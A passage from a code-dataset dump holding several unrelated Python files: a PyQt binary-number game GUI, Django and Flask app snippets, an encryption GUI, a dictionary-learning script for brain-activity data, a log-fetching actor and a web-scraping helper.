buttonBin2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin2.setDisabled(True)\n buttonBin1= QtGui.QPushButton(\"1\", mainWindow)\n buttonBin1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n buttonBin1.setDisabled(True)\n \"\"\"//Binary 8bits Buttons\"\"\"\n\n \"\"\"Current Number Holders\"\"\"\n labelForCurrentNumHolders = QtGui.QLabel(\"Current Number:\", mainWindow)\n labelForCurrentNumHolders.setAlignment(QtCore.Qt.AlignRight)\n labelForCurrentNumHolders.setMinimumSize(120,0)\n labelForCurrentNumHolders.show()\n curNumHolder128 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder128.setText(curNumHolderVar128)\n curNumHolder128.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder128.setReadOnly(True)\n curNumHolder128.show()\n curNumHolder64 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder64.setText(curNumHolderVar64)\n curNumHolder64.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder64.setReadOnly(True)\n curNumHolder64.show()\n curNumHolder32 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder32.setText(curNumHolderVar32)\n curNumHolder32.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder32.setReadOnly(True)\n curNumHolder32.show()\n curNumHolder16 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder16.setText(curNumHolderVar16)\n curNumHolder16.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder16.setReadOnly(True)\n curNumHolder16.show()\n curNumHolder8 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder8.setText(curNumHolderVar8)\n curNumHolder8.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder8.setReadOnly(True)\n curNumHolder8.show()\n curNumHolder4 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder4.setText(curNumHolderVar4)\n curNumHolder4.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder4.setReadOnly(True)\n curNumHolder4.show()\n curNumHolder2 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder2.setText(curNumHolderVar2)\n curNumHolder2.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder2.setReadOnly(True)\n curNumHolder2.show()\n curNumHolder1 = QtGui.QLineEdit(\"\",mainWindow)\n curNumHolder1.setText(curNumHolderVar1)\n curNumHolder1.setAlignment(QtCore.Qt.AlignCenter)\n curNumHolder1.setReadOnly(True)\n curNumHolder1.show()\n \"\"\"//Calculation Holders\"\"\"\n \n \"\"\"Main Aid Matrix\"\"\"\n labelForMainMatrix = QtGui.QLabel(\"Subtract:\", mainWindow)\n labelForMainMatrix.setMinimumSize(120,0)\n labelForMainMatrix.setAlignment(QtCore.Qt.AlignRight)\n labelForMainMatrix.setHidden(hideAidMatrix)\n mainAidMatrix128 = QtGui.QLabel(\"-130\", mainWindow)\n mainAidMatrix128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n mainAidMatrix128.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix128.setHidden(hideAidMatrix)\n mainAidMatrix64 = QtGui.QLabel(\"-70\", mainWindow)\n mainAidMatrix64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n mainAidMatrix64.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix64.setHidden(hideAidMatrix)\n mainAidMatrix32 = QtGui.QLabel(\"-40\", mainWindow)\n mainAidMatrix32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix32.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix32.setHidden(hideAidMatrix)\n mainAidMatrix16 = QtGui.QLabel(\"-20\", mainWindow)\n mainAidMatrix16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix16.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix16.setHidden(hideAidMatrix)\n mainAidMatrix8 = QtGui.QLabel(\"-10\", mainWindow)\n mainAidMatrix8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix8.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix8.setHidden(hideAidMatrix)\n mainAidMatrix4 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix4.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix4.setHidden(hideAidMatrix)\n mainAidMatrix2 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix2.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix2.setHidden(hideAidMatrix)\n mainAidMatrix1 = QtGui.QLabel(\"\", mainWindow)\n mainAidMatrix1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n mainAidMatrix1.setAlignment(QtCore.Qt.AlignHCenter)\n mainAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Main Aid Matrix\"\"\"\n \n \"\"\"Secondary Aid Matrix\"\"\"\n labelForSecMatrix = QtGui.QLabel(\"Add:\", mainWindow)\n labelForSecMatrix.setAlignment(QtCore.Qt.AlignRight)\n labelForSecMatrix.setMinimumSize(120,0)\n labelForSecMatrix.setHidden(hideAidMatrix)\n secAidMatrix128 = QtGui.QLabel(\"+2\", mainWindow)\n secAidMatrix128.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed)\n secAidMatrix128.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix128.setHidden(hideAidMatrix)\n secAidMatrix64 = QtGui.QLabel(\"+6\", mainWindow)\n secAidMatrix64.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix64.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix64.setHidden(hideAidMatrix)\n secAidMatrix32 = QtGui.QLabel(\"+8\", mainWindow)\n secAidMatrix32.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix32.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix32.setHidden(hideAidMatrix)\n secAidMatrix16 = QtGui.QLabel(\"+4\", mainWindow)\n secAidMatrix16.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix16.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix16.setHidden(hideAidMatrix)\n secAidMatrix8 = QtGui.QLabel(\"+2\", mainWindow)\n secAidMatrix8.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix8.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix8.setHidden(hideAidMatrix)\n secAidMatrix4 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix4.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix4.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix4.setHidden(hideAidMatrix)\n secAidMatrix2 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix2.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix2.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix2.setHidden(hideAidMatrix)\n secAidMatrix1 = QtGui.QLabel(\"\", mainWindow)\n secAidMatrix1.setSizePolicy(QtGui.QSizePolicy.Expanding,QtGui.QSizePolicy.Fixed) \n secAidMatrix1.setAlignment(QtCore.Qt.AlignHCenter)\n secAidMatrix1.setHidden(hideAidMatrix)\n \"\"\"//Secondary Aid Matrix\"\"\"\n \n \"\"\"Answer Input Holders\"\"\"\n labelForanswerDecInput = QtGui.QLabel(\"Subtraction Remainder:\")\n labelForanswerDecInput.setMinimumSize(120,0)\n labelForanswerDecInput.setAlignment(QtCore.Qt.AlignRight)\n labelForanswerDecInput.show()\n answerDecInput128 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput128.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput128.setText(varInitialState)\n answerDecInput128.connect(answerDecInput128, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer128)\n answerDecInput128.show()\n answerDecInput64 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput64.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput64.setText(varInitialState)\n answerDecInput64.connect(answerDecInput64, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer64)\n answerDecInput64.show()\n answerDecInput32 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput32.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput32.setText(varInitialState)\n answerDecInput32.connect(answerDecInput32, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer32)\n answerDecInput32.show()\n answerDecInput16 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput16.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput16.setText(varInitialState)\n answerDecInput16.connect(answerDecInput16, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer16)\n answerDecInput16.show()\n answerDecInput8 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput8.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput8.setText(varInitialState)\n answerDecInput8.connect(answerDecInput8, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer8)\n answerDecInput8.show()\n answerDecInput4 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput4.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput4.setText(varInitialState)\n answerDecInput4.connect(answerDecInput4, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer4)\n answerDecInput4.show()\n answerDecInput2 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput2.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput2.setText(varInitialState)\n answerDecInput2.connect(answerDecInput2, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer2)\n answerDecInput2.show()\n answerDecInput1 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput1.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput1.setText(varInitialState)\n answerDecInput1.connect(answerDecInput1, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer1)\n answerDecInput1.show()\n \"\"\"//Answer Input Holders\"\"\"\n \n \"\"\"Binary Answer Holders\"\"\"\n labelForBinaryanswerDecInput = QtGui.QLabel(\"Binary:\")\n labelForBinaryanswerDecInput.setAlignment(QtCore.Qt.AlignRight)\n labelForBinaryanswerDecInput.setMinimumSize(120,0)\n labelForBinaryanswerDecInput.show()\n answerBinaryInput128 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput128.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput128.setText(varInitialState)\n answerBinaryInput128.setReadOnly(True)\n answerBinaryInput128.show()\n answerBinaryInput64 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput64.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput64.setText(varInitialState)\n answerBinaryInput64.setReadOnly(True)\n answerBinaryInput64.show()\n answerBinaryInput32 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput32.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput32.setText(varInitialState)\n answerBinaryInput32.setReadOnly(True)\n answerBinaryInput32.show()\n answerBinaryInput16 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput16.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput16.setText(varInitialState)\n answerBinaryInput16.setReadOnly(True)\n answerBinaryInput16.show()\n answerBinaryInput8 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput8.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput8.setText(varInitialState)\n answerBinaryInput8.setReadOnly(True)\n answerBinaryInput8.show()\n answerBinaryInput4 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput4.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput4.setText(varInitialState)\n answerBinaryInput4.setReadOnly(True)\n answerBinaryInput4.show()\n answerBinaryInput2 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput2.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput2.setText(varInitialState)\n answerBinaryInput2.setReadOnly(True)\n answerBinaryInput2.show()\n answerBinaryInput1 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput1.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput1.setText(varInitialState)\n answerBinaryInput1.setReadOnly(True)\n answerBinaryInput1.show()\n \"\"\"//Binary Answer Holders\"\"\"\n \n \"\"\"Layout Horizontal\"\"\"\n buttonAidMatrixLayot = QtGui.QHBoxLayout()\n buttonAidMatrixLayot.addWidget(buttonHideShowMatrix)\n buttonAidMatrixLayot.addStretch(1)\n \n buttonNewNumberLayout = QtGui.QHBoxLayout()\n buttonNewNumberLayout.addWidget(newNumButton)\n buttonNewNumberLayout.addStretch(1)\n\n buttonLayoutBin = QtGui.QHBoxLayout() \n buttonLayoutBin.addWidget(labelForBinButtons) \n buttonLayoutBin.addWidget(buttonBin128)\n buttonLayoutBin.addWidget(buttonBin64)\n buttonLayoutBin.addWidget(buttonBin32)\n buttonLayoutBin.addWidget(buttonBin16)\n buttonLayoutBin.addWidget(buttonBin8)\n buttonLayoutBin.addWidget(buttonBin4)\n buttonLayoutBin.addWidget(buttonBin2)\n buttonLayoutBin.addWidget(buttonBin1)\n\n curNumLayout = QtGui.QHBoxLayout()\n curNumLayout.addWidget(labelForCurrentNumHolders)\n curNumLayout.addWidget(curNumHolder128)\n curNumLayout.addWidget(curNumHolder64)\n curNumLayout.addWidget(curNumHolder32)\n curNumLayout.addWidget(curNumHolder16)\n curNumLayout.addWidget(curNumHolder8)\n curNumLayout.addWidget(curNumHolder4)\n curNumLayout.addWidget(curNumHolder2)\n curNumLayout.addWidget(curNumHolder1)\n \n mainAidMatrixLayout = QtGui.QHBoxLayout()\n mainAidMatrixLayout.addWidget(labelForMainMatrix)\n mainAidMatrixLayout.addWidget(mainAidMatrix128)\n mainAidMatrixLayout.addWidget(mainAidMatrix64)\n mainAidMatrixLayout.addWidget(mainAidMatrix32)\n mainAidMatrixLayout.addWidget(mainAidMatrix16)\n mainAidMatrixLayout.addWidget(mainAidMatrix8)\n mainAidMatrixLayout.addWidget(mainAidMatrix4)\n mainAidMatrixLayout.addWidget(mainAidMatrix2)\n mainAidMatrixLayout.addWidget(mainAidMatrix1)\n \n secAidMatrixLayout = QtGui.QHBoxLayout()\n secAidMatrixLayout.addWidget(labelForSecMatrix)\n secAidMatrixLayout.addWidget(secAidMatrix128)\n secAidMatrixLayout.addWidget(secAidMatrix64)\n secAidMatrixLayout.addWidget(secAidMatrix32)\n secAidMatrixLayout.addWidget(secAidMatrix16)\n secAidMatrixLayout.addWidget(secAidMatrix8)\n secAidMatrixLayout.addWidget(secAidMatrix4)\n secAidMatrixLayout.addWidget(secAidMatrix2)\n secAidMatrixLayout.addWidget(secAidMatrix1)\n \n answerDecInputLayout = QtGui.QHBoxLayout()\n answerDecInputLayout.addWidget(labelForanswerDecInput)\n answerDecInputLayout.addWidget(answerDecInput128)\n answerDecInputLayout.addWidget(answerDecInput64)\n answerDecInputLayout.addWidget(answerDecInput32)\n answerDecInputLayout.addWidget(answerDecInput16)\n answerDecInputLayout.addWidget(answerDecInput8)\n answerDecInputLayout.addWidget(answerDecInput4)\n answerDecInputLayout.addWidget(answerDecInput2)\n answerDecInputLayout.addWidget(answerDecInput1)\n \n answerBinaryInputLayout = QtGui.QHBoxLayout()\n answerBinaryInputLayout.addWidget(labelForBinaryanswerDecInput)\n answerBinaryInputLayout.addWidget(answerBinaryInput128)\n answerBinaryInputLayout.addWidget(answerBinaryInput64)\n answerBinaryInputLayout.addWidget(answerBinaryInput32)\n answerBinaryInputLayout.addWidget(answerBinaryInput16)\n answerBinaryInputLayout.addWidget(answerBinaryInput8)\n answerBinaryInputLayout.addWidget(answerBinaryInput4)\n answerBinaryInputLayout.addWidget(answerBinaryInput2)\n answerBinaryInputLayout.addWidget(answerBinaryInput1)\n \"\"\"//Layout Horizontal\"\"\"\n \n \"\"\"Layout Vertical\"\"\"\n mainVerticalLayout = QtGui.QVBoxLayout()\n \"\"\"//Layout Vertical\"\"\"\n \n \"\"\"Add to Vertical Layout\"\"\"\n mainVerticalLayout.addLayout(buttonAidMatrixLayot)\n mainVerticalLayout.addLayout(buttonNewNumberLayout)\n mainVerticalLayout.addLayout(buttonLayoutBin)\n mainVerticalLayout.addLayout(answerBinaryInputLayout)\n mainVerticalLayout.addLayout(curNumLayout)\n mainVerticalLayout.addLayout(mainAidMatrixLayout)\n mainVerticalLayout.addLayout(secAidMatrixLayout)\n mainVerticalLayout.addLayout(answerDecInputLayout)\n \"\"\"//Add to Vertical Layout\"\"\"\n \n \"\"\"MainWindow Layout\"\"\"\n mainVerticalLayout.addStretch(1)\n mainWindow.setLayout(mainVerticalLayout)\n \"\"\"//MainWindow Layout\"\"\"\n \n sys.exit(binaryGame.exec_())\n \nmain()\n","sub_path":"NetworkBinaryGame.py","file_name":"NetworkBinaryGame.py","file_ext":"py","file_size_in_byte":31225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648708098","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.template.loader import render_to_string\n\nfrom .models import ViralVideo\n\n\n@receiver(post_save, sender=ViralVideo)\ndef inform_administrators(sender, **kwargs):\n from django.core.mail import mail_admins\n\n instance = kwargs[\"instance\"]\n created = kwargs[\"created\"]\n\n if created:\n context = {\"title\": instance.title, \"link\": instance.get_url()}\n subject = render_to_string(\n \"viral_videos/email/administrator/subject.txt\", context\n )\n plain_text_message = render_to_string(\n \"viral_videos/email/administrator/message.txt\", context\n )\n html_message = render_to_string(\n \"viral_videos/email/administrator/message.html\", context\n )\n\n mail_admins(\n subject=subject.strip(),\n message=plain_text_message,\n html_message=html_message,\n fail_silently=True,\n )\n","sub_path":"ch10/myproject_virtualenv/src/django-myproject/myproject/apps/viral_videos/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"79970756","text":"from flaskr.models import db\n\n\"\"\"\nQuestion\n\"\"\"\n\n\nclass Question(db.Model):\n __tablename__ = 'questions'\n\n id = db.Column(db.Integer, primary_key=True)\n question = db.Column(db.String, nullable=False)\n answer = db.Column(db.String, nullable=False)\n category_id = db.Column(\n db.Integer,\n db.ForeignKey('categories.id'),\n nullable=False)\n difficulty = db.Column(db.Integer, nullable=False)\n\n def __init__(self, question, answer, category_id, difficulty):\n self.question = question\n self.answer = answer\n self.category_id = category_id\n self.difficulty = difficulty\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'question': self.question,\n 'answer': self.answer,\n 'category_id': self.category_id,\n 'difficulty': self.difficulty\n }\n","sub_path":"projects/02_trivia_api/starter/backend/flaskr/models/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54622985","text":"import Encryptor\nimport Decryptor\nimport SphereCryptor\nfrom Point import Point\nfrom Vector import Vector\nfrom appJar import gui\nimport pyperclip\n\n\n# encrypted = Encryptor.encrypt(\"hello\", 16)\n# print(encrypted)\n# decrypted = Decryptor.decrypt(encrypted)\n# print(decrypted)\n\n\n# handle button events\ndef press(button):\n text = app.getEntry(\"Text\")\n difficulty = app.getEntry(\"Difficulty\")\n if button == \"Encode\":\n encrypt = Encryptor.encrypt(text, int(difficulty))\n pyperclip.copy(encrypt)\n app.setMessage('Output', encrypt)\n else:\n decrypt = Decryptor.decrypt(text, int(difficulty))\n pyperclip.copy(decrypt)\n app.setMessage('Output', decrypt)\n\n\n# create a GUI variable called app\napp = gui(\"sphereCrypt\", \"650x400\")\napp.setBg(\"orange\")\napp.setFont(18)\n\n# add & configure widgets - widgets get a name, to help referencing them later\napp.addLabel(\"title\", \"Welcome to sphereCrypt\")\napp.setLabelBg(\"title\", \"blue\")\napp.setLabelFg(\"title\", \"orange\")\n\napp.addLabelEntry(\"Text\")\napp.addLabelEntry(\"Difficulty\")\napp.addMessage(\"Info\", 'Difficulty is any number between two and sixteen. Additionally, '\n 'The output of the encryption / decryption is automatically copied to your clipboard, '\n 'so in order to access the messages just CTRL-V on any text line')\napp.setMessageWidth(\"Info\", 650)\napp.addEmptyMessage('Output')\napp.setMessageWidth('Output', 650)\n\n# link the buttons to the function called press\napp.addButtons([\"Encode\", \"Decode\"], press)\n\napp.setFocus(\"Text\")\n\n# start the GUI\napp.go()\n","sub_path":"dist/__init__.app/Contents/Resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"243488940","text":"#!=usr/bin/python\n#-*- coding: utf-8 -*-\n#DL.py\n\n##このプログラムは、与えられた脳活動行列と意味表象行列からtimelagを考慮して結合行列を作成し、\n##辞書学習を行い、辞書と係数を保存するプログラムである.\n##コマンド入力\n##1.VB/TV 2.被験者名 3.予測精度の閾値 4.基底数 5.time lag 6.間引き数(何sampleに1枚抜くか)\n\nimport sys\nimport pickle\nimport time\nimport os\nimport numpy as np\nfrom sklearn.decomposition import MiniBatchDictionaryLearning\nfrom sklearn.decomposition import DictionaryLearning\nfrom sklearn.decomposition import SparseCoder\n\n# データ保存場所のパス\nDATA_DIR = \"../../data\"\n\ndef get_time_shift_data(brain_data, semantic_data, target, sub, shift):\n\n\t\"\"\"\n\tbrain_data:脳活動行列\n\tsemantic_data:意味表象行列\n\ttarget:VB/TV\n\tsub:被験者名\n\tshift:何秒ずらしか\n\t\t\n\t脳活動への反映時間の差を考慮して、脳活動行列、意味表象行列それぞれをずらして返す\n\t\"\"\"\n\t#time lagを考慮した意味表象を返す\n\tif target == 'VB': #VBの場合9000サンプル\n\t\tif sub != 'DK': #被験者ST, SNについては2秒に1サンプル\n\t\t\tstart = int(shift/2)\n\t\t\tend = int(4500-shift/2)\n\t\t\tbrain_data = brain_data[start:]\n\t\t\tsemantic_data = semantic_data[::2]\n\t\t\tsemantic_data = semantic_data[0:end]\n\t\telse:\n\t\t\tstart = int(shift)\n\t\t\tend = int(9000-shift)\n\t\t\tbrain_data = brain_data[start:]\n\t\t\tsemantic_data = semantic_data[0:end]\n\telse: #TVの場合は7200サンプル\n\t\tstart = int(shift)\n\t\tend = int(7200-shift)\n\t\tbrain_data = brain_data[start:]\n\t\tsemantic_data = semantic_data[0:end]\n\n\treturn brain_data, semantic_data\n\ndef main():\n\n\tstart = time.time()\n\n\targs = sys.argv\n\ttarget = args[1]\n\tsub = args[2]\n\tthreshold = args[3]\n\tdimention = int(args[4])\n\tshift = int(args[5])\n\tsample = int(args[6])\n\n\tprint('target : {}'.format(target))\n\tprint('subject : {}'.format(sub))\n\n\n\tprint('{} secずらし'.format(shift))\n\n\t#脳活動データ読み込み\n\twith open( DATA_DIR + '/Brain/' + target + '/' + sub + '_train_reduced_' + threshold +'.pickle', 'rb') as f:\n\t\tbrain_data = pickle.load(f)\n\n\t#意味表象データ読み込み\n\twith open( DATA_DIR + '/srm/' + target + '_srm300_train.pickle', 'rb') as f:\n\t\tsemantic_data = pickle.load(f)\n\n\t#時間差を考慮した意味表象行列取得\n\tbrain_data, semantic_data = get_time_shift_data(brain_data, semantic_data, target, sub, shift)\n\n\t\n\tprint('brain sample : {}'.format(len(brain_data)))\n\tprint('semantic_data : {}'.format(len(semantic_data)))\n\n\t#2つを結合した合成行列を作成\n\tbrainw2vdata = np.c_[brain_data, semantic_data]\n\tbrainw2vdata = np.array(brainw2vdata)\n\n\tbrainw2vdata = brainw2vdata[::sample]\n\n\tprint(\"次元:\")\n\tprint(brainw2vdata.shape)\n\n\t#辞書学習\n\tdict_model = DictionaryLearning(n_components = dimention, alpha = 1.0, transform_algorithm = 'lasso_lars', transform_alpha = 1.0, fit_algorithm = 'lars', verbose = True)\n\tdict_model.fit(brainw2vdata)\n\n\t#辞書\n\tDict = dict_model.components_\n\tprint(\"辞書:\")\n\tprint(Dict.shape)\n\n\t#係数 \n\tcoef = dict_model.transform(brainw2vdata)\n\tprint(\"係数:\")\n\tprint(coef.shape)\n\n\t#辞書保存\n\tf = open( DATA_DIR + \"/Dict/\" + target + \"/Dict_\" + sub + \"_pred\" + threshold + \"_base\" + str(dimention) + \"_sec\" + str(shift) + \"_sample\" + str(sample) + \".pickle\", \"wb\")\n\tpickle.dump(Dict, f)\n\tf.close()\n\n\t#係数保存\n\tf = open( DATA_DIR + \"/Dict/\" + target + \"/Coef_\" + sub + \"_pred\" + threshold + \"_base\" + str(dimention) + \"_sec\" + str(shift) + \"_sample\" + str(sample) + \".pickle\", \"wb\")\n\tpickle.dump(coef, f)\n\tf.close()\n\n\t#計算時間出力\n\telapsed_time = time.time() - start\n\tprint ((\"elapsed_time:{0}\".format(elapsed_time)) + \"[sec]\")\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"src/model/DL.py","file_name":"DL.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"108988862","text":"from django.conf.urls import url,include\nfrom . import views\n\n# for mysite/urls.py keep clean.\n\nurlpatterns = [\n # when someone visit myblog with url pattern like '^$',\n # server maybe shows views.post_list. remember\n url(r'^post/$', views.post_list, name='post_list'),\n url(r'^signup/$', views.signup,name='signup'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P[0-9]+)/$',views.post_detail, name='post_detail'),\n url(r'^post/(?P[0-9]+)/confirm/$',views.confirm, name='confirm'),\n url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name='post_edit'),\n url(r'^post/(?P\\d+)/remove/$', views.post_remove, name='post_remove'),\n url(r'^post/(?P\\d+)/comment/$',views.add_comment_to_post, name ='add_comment_to_post'),\n\turl(r'^study/$', views.study,name='study'),\n\turl(r'^home/$', views.home, name='home'),\n\turl(r'', views.home, name='home'),\n\turl('',include('social.apps.django_app.urls',namespace='social')),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280731510","text":"# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom .utils import WorkerActor\n\n\nclass CustomLogFetchActor(WorkerActor):\n def __init__(self):\n super().__init__()\n self._dispatch_ref = None\n\n def post_create(self):\n from .dispatcher import DispatchActor\n\n self._dispatch_ref = self.ctx.actor_ref(DispatchActor.default_uid())\n self._dispatch_ref.register_free_slot(self.uid, 'custom_log')\n\n def fetch_logs(self, log_paths, offsets, sizes):\n result = []\n for i, log_path in enumerate(log_paths):\n log_result = dict()\n\n offset = offsets[i]\n size = sizes[i]\n\n with self.ctx.fileobject(log_path, mode='r') as f:\n if offset < 0:\n # process negative offset\n offset = max(os.path.getsize(log_path) + offset, 0)\n\n if offset:\n f.seek(offset)\n\n log_result['log'] = f.read(size)\n log_result['offset'] = f.tell()\n\n result.append(log_result)\n\n return result\n","sub_path":"mars/worker/custom_log.py","file_name":"custom_log.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428210059","text":"from __future__ import print_function\nimport sys\nimport urllib2\n# import os\nfrom bs4 import BeautifulSoup\n\n\nclass URLtoHTML:\n\t'''\n\tConverts given URL to text output. \n\n\t'''\n\n\tdef __init__(self, url):\n\t\t''' (URLtoText, str) -> NoneType\n\t\t'''\n\n\t\tself.url = url\n\n\tdef convert_only_tables(self):\n\t\t''' (URLtoText) -> str\n\t\t'''\n\n\t\tself.response = urllib2.urlopen(self.url)\n\t\tself.html = self.response.read()\n\t\tself.soup = BeautifulSoup(self.html)\n\t\treturn self.soup\n\n\tdef extract_from_table(self, converted_text):\n\t\t''' (URLtoText, BeautifulSoup) -> NoneType\n\t\t'''\n\n\t\tsecond_table = []\n\t\tjust_text = str(converted_text)\n\t\tfirst_table = just_text.split('')\n\t\tfor item in first_table:\n\t\t\tsecond_table.append(item.strip('\\n'))\n\t\tstring_table_HTML = ' '.join(second_table)\n\t\treturn string_table_HTML\n\n\tdef join_tables(self, final_table):\n\t\t''' (URLtoText) -> str\n\t\t'''\n\n\t\ttable_into_string = ' '.join(final_table)\n\t\tfinal_string = table_into_string.strip('\\n')\n\t\treturn final_string \n\n\nclass 